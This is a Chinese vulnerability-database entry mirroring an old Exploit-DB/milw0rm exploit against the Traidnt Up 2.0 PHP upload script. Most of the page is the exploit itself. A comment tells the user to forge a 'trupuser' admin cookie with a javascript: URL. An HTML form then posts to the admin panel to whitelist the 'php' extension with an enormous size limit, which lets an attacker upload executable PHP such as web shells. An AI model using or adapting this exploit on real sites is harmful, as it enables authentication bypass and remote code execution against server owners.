Traidnt up 2.0 - 'cookie' Add Extension Bypass

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057559 漏洞类型
发布时间 2009-03-11 更新时间 2009-03-11
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8202
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<html>
<center>
<br>
<br>
<!--
#########################################################
#
#	Traidnt Up version 2.0 Add Extension By Pass
#	Author: SP4rT
#	Email : SP4rt@Yahoo.coM
#	DownLoad : http://traidnt.net/vb/showthread.php?t=943260
#	Downloads : 33712
#
#	1.	Enter uploadcp url 
#	2.	javascript:documentcookie="trupuser=SP4rT;";
#	3.	Enter this Page After Edit {script_path} & PosT your Extension .
#
#########################################################
-->
<form name='traidnt-ext' action='http:/{script_path}/uploadcp/files.php?do=extension&go=add' method='POST'>
<table border='1' width='450'>
<tr>
<td align='center' colspan='2'>Add Extension :</td>
</tr>
<tr>
<td align=center><input type='text' name='exname' value='php'>
<input type='hidden' name='maxsize' value='1000000000000'>
<input type='submit' value='   Add Ext   '>

</td>
</tr>
</table>

# milw0rm.com [2009-03-11]